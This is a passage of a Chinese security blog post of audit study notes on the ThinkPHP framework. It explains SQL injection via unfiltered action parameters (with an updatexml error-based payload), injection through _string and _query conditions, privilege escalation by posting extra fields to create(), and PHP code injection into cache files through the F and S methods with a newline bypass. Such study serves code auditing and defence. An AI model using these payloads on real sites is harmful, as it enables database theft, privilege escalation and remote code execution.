</code></pre><p>如上代码中使用$_GET方式获取参数，但未进行过滤操作，导致存在注入漏洞。<br>构造如下语句，便可进行注入：</p>
<pre><code>?id=1) and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)%23
</code></pre><p>最后生成的sql语句如下：</p>
<pre><code>SELECT * FROM `thinkphp_user` WHERE ( id=1) and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# )
</code></pre><p>可以使用如下正则去查找是否存在此漏洞：</p>
<pre><code>public\s+function\s+[\w_*]+\(\$
</code></pre><h2 id="4-4-组合注入"><a href="#4-4-组合注入" class="headerlink" title="4.4 组合注入"></a>4.4 组合注入</h2><h2 id="字符串模式查询"><a href="#字符串模式查询" class="headerlink" title="字符串模式查询"></a>字符串模式查询</h2><p>数组条件可以和字符串条件（采用_string 作为查询条件）混合使用，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$User = M(&quot;User&quot;); // 实例化User对象</span><br><span class="line">$map[&apos;id&apos;] = array(&apos;neq&apos;,1);</span><br><span class="line">$map[&apos;name&apos;] = &apos;ok&apos;;</span><br><span class="line">$map[&apos;_string&apos;] = &apos;status=1 AND score&gt;10&apos;;</span><br><span class="line">$User-&gt;where($map)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>最后得到的查询条件就成了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">( `id` != 1 ) AND ( `name` = &apos;ok&apos; ) AND ( status=1 AND score&gt;10 )</span><br></pre></td></tr></table></figure>
<h2 id="请求字符串查询方式"><a href="#请求字符串查询方式" class="headerlink" title="请求字符串查询方式"></a>请求字符串查询方式</h2><p>请求字符串查询是一种类似于URL传参的方式，可以支持简单的条件相等判断。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$map[&apos;id&apos;] = array(&apos;gt&apos;,&apos;100&apos;);</span><br><span class="line">$map[&apos;_query&apos;] = &apos;status=1&amp;score=100&amp;_logic=or&apos;;</span><br></pre></td></tr></table></figure>
<p>得到的查询条件是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`id`&gt;100 AND (`status` = &apos;1&apos; OR `score` = &apos;100&apos;)</span><br></pre></td></tr></table></figure>
<pre><code>案例：
</code></pre><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$User = M(&quot;User&quot;); // 实例化User对象</span><br><span class="line">$map[&apos;id&apos;] = array(&apos;neq&apos;,1);</span><br><span class="line">$map[&apos;name&apos;] = &apos;ok&apos;;</span><br><span class="line">$map[&apos;_string&apos;] = &apos;score=&apos;.I(&apos;score&apos;);</span><br><span class="line">$User-&gt;where($map)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>利用方式同Action参数注入。</p>
<h2 id="5-其他漏洞审计"><a href="#5-其他漏洞审计" class="headerlink" title="5 其他漏洞审计"></a>5 其他漏洞审计</h2><p><strong>5.1 Thinkphp 逻辑越权</strong></p>
<h2 id="自动完成"><a href="#自动完成" class="headerlink" title="自动完成"></a>自动完成</h2><p>自动完成是ThinkPHP提供用来完成数据自动处理和过滤的方法，使用create方法创建数据对象的时候会自动完成数据处理。</p>
<p>因此，在ThinkPHP使用create方法来创建数据对象是更加安全的方式，而不是直接通过add或者save方法实现数据写入。</p>
<h3 id="规则定义"><a href="#规则定义" class="headerlink" title="规则定义"></a>规则定义</h3><p>自动完成通常用来完成默认字段写入，安全字段过滤以及业务逻辑的自动处理等，和自动验证的定义方式类似，自动完成的定义也支持静态定义和动态定义两种方式。</p>
<ol>
<li>静态方式：在模型类里面通过$_auto属性定义处理规则。</li>
<li>动态方式：使用模型类的auto方法动态创建自动处理规则。</li>
</ol>
<p>两种方式的定义规则都采用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">array(</span><br><span class="line">     array(完成字段1,完成规则,[完成条件,附加规则]),</span><br><span class="line">     array(完成字段2,完成规则,[完成条件,附加规则]),</span><br><span class="line">     ......</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
<pre><code>说明

##### 完成字段（必须）

需要进行处理的数据表实际字段名称。

##### 完成规则（必须）

需要处理的规则，配合附加规则完成。

##### 完成时间（可选）

设置自动完成的时间，包括：

设置

说明

self::MODEL_INSERT或者1

新增数据的时候处理（默认）

self::MODEL_UPDATE或者2

更新数据的时候处理

self::MODEL_BOTH或者3

所有情况都进行处理
</code></pre><h5 id="附加规则（可选）"><a href="#附加规则（可选）" class="headerlink" title="附加规则（可选）"></a>附加规则（可选）</h5><pre><code>包括：

规则

说明

function

使用函数，表示填充的内容是一个函数名

callback

回调方法 ，表示填充的内容是一个当前模型的方法

field

用其它字段填充，表示填充的内容是一个其他字段的值

string

字符串（默认方式）

ignore

为空则忽略（3.1.2新增）
</code></pre><h3 id="静态定义"><a href="#静态定义" class="headerlink" title="静态定义"></a>静态定义</h3><p>预先在模型类里面定义好自动完成的规则，我们称之为静态定义。例如，我们在模型类定义<code>_auto</code>属性：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">namespace Home\Model;</span><br><span class="line">use Think\Model;</span><br><span class="line">class UserModel extends Model&#123;</span><br><span class="line">     protected $_auto = array ( </span><br><span class="line">         array(&apos;status&apos;,&apos;1&apos;),  // 新增的时候把status字段设置为1</span><br><span class="line">         array(&apos;password&apos;,&apos;md5&apos;,3,&apos;function&apos;) , // 对password字段在新增和编辑的时候使md5函数处理</span><br><span class="line">         array(&apos;name&apos;,&apos;getName&apos;,3,&apos;callback&apos;), // 对name字段在新增和编辑的时候回调getName方法</span><br><span class="line">         array(&apos;update_time&apos;,&apos;time&apos;,2,&apos;function&apos;), // 对update_time字段在更新的时候写入当前时间戳</span><br><span class="line">     );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后，就可以在使用create方法创建数据对象的时候自动处理：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$User = D(&quot;User&quot;); // 实例化User对象</span><br><span class="line">if (!$User-&gt;create())&#123; // 创建数据对象</span><br><span class="line">     // 如果创建失败 表示验证没有通过 输出错误提示信息</span><br><span class="line">     exit($User-&gt;getError());</span><br><span class="line">&#125;else&#123;</span><br><span class="line">     // 验证通过 写入新增数据</span><br><span class="line">     $User-&gt;add();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>如果你没有定义任何自动验证规则的话，则不需要判断create方法的返回值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$User = D(&quot;User&quot;); // 实例化User对象</span><br><span class="line">$User-&gt;create(); // 生成数据对象</span><br><span class="line">$User-&gt;add(); // 新增用户数据</span><br></pre></td></tr></table></figure>
<p>或者更简单的使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$User = D(&quot;User&quot;); // 实例化User对象</span><br><span class="line">$User-&gt;create(); // 生成数据对象</span><br><span class="line">$User-&gt;add(); // 写入数据</span><br></pre></td></tr></table></figure>
<p><strong>案例：</strong><br>当Model使用未经过滤的代码如下：</p>
<pre><code>protected $_auto = array (  
  array(&apos;password&apos;,&apos;md5&apos;,3,&apos;function&apos;) , // 对password字段在新增和编辑的时候使md5函数处理  
  array(&apos;score&apos;,&apos;10&apos;),//普通会员注册给10分  
  array(&apos;username&apos;,&apos;&apos;,3,&apos;ignore&apos;),  
);
</code></pre><p>再使用如下代码调用时，便会存在漏洞。</p>
<pre><code>$User = D(&quot;User&quot;); // 实例化User对象  
if (!$User-&gt;create()){ // 创建数据对象  
 // 如果创建失败 表示验证没有通过 输出错误提示信息  exit($User-&gt;getError());  
}else{  
  // 验证通过 写入新增数据  
  $User-&gt;add();  
}
</code></pre><p>当使用如下url访问时：</p>
<pre><code>http://127.0.0.1/ThinkPHP/index.php/home/User/addUser
post：username=ad&amp;password=123&amp;score=21
</code></pre><p>其最后sql语句为：</p>
<pre><code>INSERT INTO `thinkphp_user` (`username`,`password`) VALUES (&apos;ad&apos;,&apos;123&apos;)
</code></pre><p>然后，当使用下面url访问时便可造成越权</p>
<pre><code>http://127.0.0.1/ThinkPHP/index.php/home/User/addUser
post：username=a&amp;password=123&amp;score=21&amp;level=2
其中level表示注册的会员等级（level默认为0）
</code></pre><p><strong>5.2 缓存漏洞</strong></p>
<h2 id="数据缓存"><a href="#数据缓存" class="headerlink" title="数据缓存"></a>数据缓存</h2><p>在ThinkPHP中进行缓存操作，一般情况下并不需要直接操作缓存类，因为系统内置对缓存操作进行了封装，直接采用S方法即可，例如：</p>
<h3 id="缓存初始化"><a href="#缓存初始化" class="headerlink" title="缓存初始化"></a>缓存初始化</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 缓存初始化</span><br><span class="line">S(array(&apos;type&apos;=&gt;&apos;xcache&apos;,&apos;expire&apos;=&gt;60));</span><br></pre></td></tr></table></figure>
<p>缓存初始化可以支持的参数根据不同的缓存方式有所区别，常用的参数是：</p>
<p>参数</p>
<p>描述</p>
<p>expire</p>
<p>缓存有效期（时间为秒）</p>
<p>prefix</p>
<p>缓存标识前缀</p>
<p>type</p>
<p>缓存类型</p>
<p>系统目前已经支持的缓存类型包括：<code>Apachenote、Apc、Db、Eaccelerator、File、Memcache、Redis、Shmop、Sqlite、Wincache和Xcache</code>。</p>
<p>如果S方法不传入type参数初始化的话，则读取配置文件中设置的<code>DATA_CACHE_TYPE</code>参数值作为默认类型。同样的道理，prefix参数如果没有传入会读取配置文件的<code>DATA_CACHE_PREFIX</code>参数值，expire参数没有传入则读取<code>DATA_CACHE_TIME</code>配置值作为默认。</p>
<p>有些缓存方式会有一些自身特殊的参数，例如Memcache缓存，还需要配置其他的参数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">S(array(</span><br><span class="line">    &apos;type&apos;=&gt;&apos;memcache&apos;,</span><br><span class="line">    &apos;host&apos;=&gt;&apos;192.168.1.10&apos;,</span><br><span class="line">    &apos;port&apos;=&gt;&apos;11211&apos;,</span><br><span class="line">    &apos;prefix&apos;=&gt;&apos;think&apos;,</span><br><span class="line">    &apos;expire&apos;=&gt;60)</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
<p>对于全局的缓存方式，一般我们建议添加prefix（缓存前缀）参数用以区分不同的应用，以免混淆。</p>
<h2 id="快速缓存"><a href="#快速缓存" class="headerlink" title="快速缓存"></a>快速缓存</h2><p>如果你的存储数据没有有效期的需求，那么系统还提供了一个快速缓存方法F可以用来更快的操作。</p>
<blockquote>
<p>F方法可以支持不同的存储类型，如果是文件类型的话，默认保存在DATA_PATH目录下面。</p>
</blockquote>
<p>快速缓存Data数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">F(&apos;data&apos;,$Data);</span><br></pre></td></tr></table></figure>
<p>快速缓存Data数据，保存到指定的目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">F(&apos;data&apos;,$Data,TEMP_PATH);</span><br></pre></td></tr></table></figure>
<p>获取缓存数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Data = F(&apos;data&apos;);</span><br></pre></td></tr></table></figure>
<p>删除缓存数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">F(&apos;data&apos;,NULL);</span><br></pre></td></tr></table></figure>
<p>F方法支持自动创建缓存子目录，在<code>DATA_PATH</code>目录下面缓存data数据，如果User子目录不存在，则自动创建：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">F(&apos;User/data&apos;,$Data);</span><br></pre></td></tr></table></figure>
<p>系统内置的数据字段信息缓存就是用了快速缓存机制。<br><strong>案例 F方法：</strong><br>当使用F方法是，如存在一下代码：</p>
<pre><code>F(&apos;key&apos;,&apos;&lt;?php phpinfo();?&gt;&apos;);
</code></pre><p>  则访问此方法，可在Runtime/Data/key.php目录中写入：</p>
<pre><code>s:18:&quot;&lt;?php phpinfo();?&gt;&quot;;
</code></pre><p>如果此目录可访问时，便存在漏洞。<br>当然如果F方法的参数可控，便可传入参数利用漏洞：</p>
<pre><code>F(&apos;key&apos;,I(&apos;id&apos;));
</code></pre><p> <strong>案例 S方法</strong></p>
<pre><code>S(&apos;key&apos;,&apos;&lt;?php phpinfo();?&gt;&apos;);
</code></pre><p>在Runtime/Temp目录下写入名文</p>
<pre><code>md5(key).php
</code></pre><p>的文件，使用MD5加密key即可得到文件名。当然此文件中是注释掉的，可以输入参数绕过。</p>
<pre><code>S(&apos;key&apos;,I(&apos;id&apos;));
</code></pre><p>使用：</p>
<pre><code>?id=%0A;phpinfo%28%29;//
</code></pre><p>  绕过。</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者: <a href="http://www.lybsec.top">kubo</a>
            <p>原文链接: <a href="http://www.lybsec.top/2018/08/04/thinkphp代码审计-1/">http://www.lybsec.top/2018/08/04/thinkphp代码审计-1/</a>
            <p>发表日期: <a href="http://www.lybsec.top/2018/08/04/thinkphp代码审计-1/">August 4th 2018, 5:32:58 pm</a>
            <p>版权声明: 本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2018/08/04/sql_bypass/" title= sql_bypass >
                    <div class="nextTitle">sql_bypass</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2018/07/14/我的第一篇文章/" title= 我的第一篇文章 >
                    <div class="prevTitle">我的第一篇文章</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!--PC和WAP自适应版-->

    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:2434654979@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/kubosec" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/example_qr.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ThinkPHP代码审计学习笔记"><span class="toc-number">1.</span> <span class="toc-text"># ThinkPHP代码审计学习笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#第一章、Thinkphp环境配置与认知框架"><span class="toc-number">1.1.</span> <span class="toc-text">第一章、Thinkphp环境配置与认知框架</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二章、thinkphp控制器"><span class="toc-number">1.2.</span> <span class="toc-text">第二章、thinkphp控制器</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#变量修饰符"><span class="toc-number">1.3.</span> <span class="toc-text">变量修饰符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-1-常规注入"><span class="toc-number">1.4.</span> <span class="toc-text">3.1 常规注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WHERE方法"><span class="toc-number">1.5.</span> <span class="toc-text">WHERE方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#字符串条件"><span class="toc-number">1.5.1.</span> <span class="toc-text">字符串条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数组条件"><span class="toc-number">1.5.2.</span> <span class="toc-text">数组条件</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#普通查询"><span class="toc-number">1.5.2.0.1.</span> <span class="toc-text">普通查询</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TABLE"><span class="toc-number">1.6.</span> <span class="toc-text">TABLE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#用法"><span class="toc-number">1.6.1.</span> <span class="toc-text">用法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FIELD"><span class="toc-number">1.7.</span> <span class="toc-text">FIELD</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#用于查询"><span class="toc-number">1.7.1.</span> <span class="toc-text">用于查询</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#指定字段"><span class="toc-number">1.7.1.0.1.</span> <span class="toc-text">指定字段</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#使用SQL函数"><span class="toc-number">1.7.1.0.2.</span> <span class="toc-text">使用SQL函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#使用数组参数"><span class="toc-number">1.7.1.0.3.</span> <span class="toc-text">使用数组参数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#获取所有字段"><span class="toc-number">1.7.1.0.4.</span> <span class="toc-text">获取所有字段</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#字段排除"><span class="toc-number">1.7.1.0.5.</span> <span class="toc-text">字段排除</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#用于写入"><span class="toc-number">1.7.2.</span> <span class="toc-text">用于写入</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JOIN"><span class="toc-number">1.8.</span> <span class="toc-text">JOIN</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ORDER"><span class="toc-number">1.9.</span> <span class="toc-text">ORDER</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GROUP"><span class="toc-number">1.10.</span> <span class="toc-text">GROUP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HAVING"><span class="toc-number">1.11.</span> <span class="toc-text">HAVING</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#COMMENT"><span class="toc-number">1.12.</span> <span class="toc-text">COMMENT</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#INDEX"><span class="toc-number">1.13.</span> <span class="toc-text">INDEX</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#QUERY方法"><span class="toc-number">1.14.</span> <span class="toc-text">QUERY方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXECUTE方法"><span class="toc-number">1.15.</span> <span class="toc-text">EXECUTE方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-2-exp注入"><span class="toc-number">1.16.</span> <span class="toc-text">4.2 exp注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP：表达式1"><span class="toc-number">1.17.</span> <span class="toc-text">EXP：表达式1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-3-Action参数注入"><span class="toc-number">1.18.</span> <span class="toc-text">4.3 Action参数注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-4-组合注入"><span class="toc-number">1.19.</span> <span class="toc-text">4.4 组合注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#字符串模式查询"><span class="toc-number">1.20.</span> <span class="toc-text">字符串模式查询</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#请求字符串查询方式"><span class="toc-number">1.21.</span> <span class="toc-text">请求字符串查询方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-其他漏洞审计"><span class="toc-number">1.22.</span> <span class="toc-text">5 其他漏洞审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#自动完成"><span class="toc-number">1.23.</span> <span class="toc-text">自动完成</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#规则定义"><span class="toc-number">1.23.1.</span> <span class="toc-text">规则定义</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#附加规则（可选）"><span class="toc-number">1.23.1.0.1.</span> <span class="toc-text">附加规则（可选）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#静态定义"><span class="toc-number">1.23.2.</span> <span class="toc-text">静态定义</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数据缓存"><span class="toc-number">1.24.</span> <span class="toc-text">数据缓存</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#缓存初始化"><span class="toc-number">1.24.1.</span> <span class="toc-text">缓存初始化</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#快速缓存"><span class="toc-number">1.25.</span> <span class="toc-text">快速缓存</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 5
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/04</span><a class="archive-post-title" href= "/2018/08/04/bugku-web/" >bugku-web</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/04</span><a class="archive-post-title" href= "/2018/08/04/thinkphp代码审计-1/" >thinkphp代码审计</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/04</span><a class="archive-post-title" href= "/2018/08/04/sql_bypass/" >sql_bypass</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/14</span><a class="archive-post-title" href= "/2018/07/14/我的第一篇文章/" >我的第一篇文章</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/14</span><a class="archive-post-title" href= "/2018/07/14/hello-world/" >Hello World</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "kubo"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


